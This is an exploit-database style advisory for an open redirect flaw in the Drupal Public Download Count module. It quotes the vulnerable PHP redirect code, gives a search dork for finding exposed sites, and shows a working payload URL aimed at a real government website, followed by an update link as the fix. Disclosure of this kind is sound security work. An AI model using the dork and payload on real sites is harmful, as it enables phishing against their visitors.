# Exploit Title: Drupal Public Download Count Module - Open Redirect # Date: 8-6-2017 # Software Link: https://www.drupal.org/project/pubdlcnt # Exploit Author: Snooper # Contact: https://t.me/Snbig # CWE: CWE-601 # Risk: Low # Category: webapps # Tested on: Kali Linux # Vulnerable File: pubdlcnt.php # Dork: inurl:/sites/all/modules/pubdlcnt/pubdlcnt.php # Version: 7.x-3.1 and lower 1. Description An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it . 2. Vulnerable Code : $url = check_url($_GET['file']); $nid = check_url($_GET['nid']); if (!eregi("^(f|ht)tps?:\/\/.*", $url)) { // check if this is absolute URL // if the URL is relative, then convert it to absolute $url = "http://" . $_SERVER['SERVER_NAME'] . $url; } if (is_valid_file_url($url)) { $filename = basename($url); pubdlcnt_update_counter($url, $filename, $nid); header('Location: ' . $url); exit; 3. Exploit : http://host/sites/all/modules/pubdlcnt/pubdlcnt.php?file=[ Open Redirect Vul ] 4. Example : https://www.stats.gov.sa/sites/all/modules/pubdlcnt/pubdlcnt.php?file=http://leader.ir 5. Solution : Update to version 8.x-1.x-dev https://www.drupal.org/project/download_count/releases/8.x-1.x-dev